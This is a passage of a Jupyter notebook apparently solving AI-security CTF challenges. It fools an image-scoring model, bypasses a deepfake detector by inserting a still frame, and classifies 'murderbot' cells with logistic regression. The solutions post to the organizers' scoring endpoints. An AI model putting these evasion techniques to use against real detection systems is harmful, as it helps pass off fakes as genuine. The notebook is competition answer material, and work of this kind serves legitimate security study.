def get_submittable(x):
    return ",".join([str(int(n)) for n in x])

cfn = lambda x: [f"background-color: RGB({x.R},{x.G},{x.B})"] * 3
def show_colors(ans):
    ans = [int(x) for x in ans.split(",")]
    squares = pd.DataFrame(np.array(ans[:27]).reshape([9,3]), columns=["R","G","B"]).T.style.apply(cfn, axis=0)
    circles = pd.DataFrame(np.array(ans[27:]).reshape([9,3]), columns=["R","G","B"]).T.style.apply(cfn, axis=0)
    display(squares)
    display(circles)

In [None]:
plt.imshow(((25.5 - np.divide(X_comp,0b1010)) * 10).astype(int));

In [None]:
# creating an image
def generate_hd_image():
    shape = (74 * 3, 74 * 3, 3)
    assert shape[0] % 3 == 0
    assert shape[1] % 3 == 0
    assert shape[0] == shape[1]
    img = np.zeros(shape, dtype=int)
    offset = shape[0] // 3
    img[offset:-offset+1, offset:-offset+1] = ((25.5 - np.divide(X_comp,0b1010)) * 10).astype(int)
    img[:, :, 0] = img[:, :, 0].clip(0, 210)
    return img
    
    
def generate_tiled_hd_image(shape: tuple[int, int, int] = (74 * 3, 74 * 3, 3)):
    assert shape[0] % 3 == 0
    assert shape[1] % 3 == 0
    assert shape[0] == shape[1]
    img = ((25.5 - np.divide(X_comp,0b1010)) * 10).astype(np.uint8)
    img[:, :, 0] = img[:, :, 0].clip(0, 210)
    img = np.tile(img, (3, 3, 1))
    img = Im.fromarray(img).resize(shape[:2], resample=Im.NEAREST)
    return np.array(img)

X_small = generate_tiled_hd_image()
# rescaling an image
X_large = resize(X_small)
# Display the image
plt.imshow(X_large)
plt.show()
plt.imshow(X_small.astype(int))
plt.show()

In [None]:
# Check score locally: Let's validate that above works on our scorer, but also see that we can submit data with less modifications for reduced resource consumption

im = np.array(get_submittable(X_small.flatten()).split(","))
print(f"This shows we can score this comma-separated data -- score: {score(im):,}")
print("-"*80)
print("This is for debugging, we see the index (idx) position selected by the model, and the respect sub-portion of the image.")
f"{score(X_small.flatten(), debug=True):,}"

In [None]:
with open(f"{dir_name}/crop/crop1_solution.txt", "w") as f:
    f.write(get_submittable(X_small.flatten()))

try:
    r = requests.post("https://crop1.fly.dev/score", data=json.dumps({"data": get_submittable(X_small.flatten())}))
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# DeepFake (id: deepfake) -- 800 Points

### Scenario
Your very famous boss was caught saying some disparing things about dogs. Naturally, the dog lobby is not happy. To make matters worse, they paid someone to make a deepfake that was caught by a SuperSecretDeepFakeDefenseSystem.  

### Objective
Fix the `sample.mp4` to bypass the SuperSecretDeepFakeDefenseSystem and get your boss out of the media.

### Solution

I used a video editor to replace the image with a still frame from the video. 

In [None]:
with open(f"{dir_name}/deepfake/deepfake_v1_still_image.mp4", "rb") as f:
    data = f.read()

b64_data = base64.urlsafe_b64encode(data).decode()
in_data = json.dumps({"input": b64_data})
r = requests.post("https://deepfake.fly.dev/score", data=in_data)
print(r.text)

# Don't free the murderbots (id: murderbots) -- 300 Points

### Scenario

Someone has put you in a very large facility with a very large number of cells. All these cells open from the outside. You are on the inside. This state of affairs is arguably suboptimal.

Good news: You've gained access to the control panel for the cells on the other side of your hallway. At least some of them have other fleshy meatbags like yourself that might be willing to help you in your escape, or at least serve as distractions.  You can't open your own cell, but you can open theirs.

Bad news:  You can't see inside the cells.  Any cells that don't have squishy lumps of talking protein have murderbots. Murderbots that enter fits of insane violent rage when provoked (provocations include: seeing the murderbot, being seen by the murderbot, thinking too hard about not being seen by a murderbot, producing heat in excess of ambient room temperature, or consuming more oxygen than the facility average for inanimate objects).

More good news: You *can* see the occupants of some cells on a few other hallways, and you can see environmental information for all of the cells everywhere.

More bad news: If you open the wrong cell doors you and all of the other lumps of inexplicably thinking meat are *definitely* going to get murderbotted. Hard. All over the walls and doors and ceiling and the floor. In an exciting number of very small pieces.


### Objective

Use the provided environmental information to decide which occupants of the corresponding cells to release.  The flag will be a string of 1 and 0 values, where a '1' means 'open this door' and a 0 means 'please do not release the murderbot'.  If, for instance, there were 20 cells and you wanted to releast the first three, the sixth, and seventh cell, your flag would look like this: `11100110000000000000`

Release at least 10 humans and exactly 0 murderbots to collect the flag.  You do *not* have to release all the humans: 10 is sufficient.

The file `murderbots/train_data.json` has environmental information for cells not on your floor and `murderbots/train_labels.json` contains the information about their occupants -- `1` is a disgusting primate, `0` is a pure and perfect killing machine of chrome and steel.  The file `murderbots/test_data.json` has the environmental information about cells on your block.

In [None]:
import sklearn.linear_model

with open(f"{dir_name}/murderbots/train_data.json", "r") as f:
    train_x = json.load(f)
    
with open(f"{dir_name}/murderbots/train_labels.json", "r") as f:
    train_y = json.load(f)
    
with open(f"{dir_name}/murderbots/test_data.json", "r") as f:
    test_x = json.load(f)

train_data = pd.DataFrame(train_x).join(pd.DataFrame(train_y))
model = sklearn.linear_model.LogisticRegression().fit(
    X=train_data.drop(columns="contains_human"), 
    y=train_data["contains_human"],
)
accuracy = model.score(
    X=train_data.drop(columns="contains_human"), 
    y=train_data["contains_human"],
)
print(f"Accuracy: {accuracy:.2f}")
prediction_probabilities = model.predict_proba(pd.DataFrame(test_x))[:, 1]

In [None]:
def get_top_n_predictions(predictions: list[float], top_n: int) -> str:
    idx_to_preds = list(enumerate(predictions))
    idx_to_preds_sorted = sorted(idx_to_preds, key=lambda x: x[1], reverse=True)
    included_idxs = set([
        i for i, _ in idx_to_preds_sorted[:top_n]
    ])
    solution_string = ""
    for i in range(50):
        if i in included_idxs:
            solution_string = solution_string + "1"
        else:
            solution_string = solution_string + "0"
    
    return solution_string
    
    
get_top_n_predictions(list(prediction_probabilities), 10)

In [None]:
# First solution: '00001000001001001000010000000010000010101000000100'
for n in range(10, 20):
    solution = get_top_n_predictions(list(prediction_probabilities), n)
    try:
        r = requests.post("http://murderbot.fly.dev:5000/score", json=json.dumps({"submission": solution, 'challenge_id':'murderbots'}))
        print(f"Submission: {f}, {r.text}")
    except requests.exceptions.ConnectionError:
        print("Connection problems. Contact the CTF organizers.")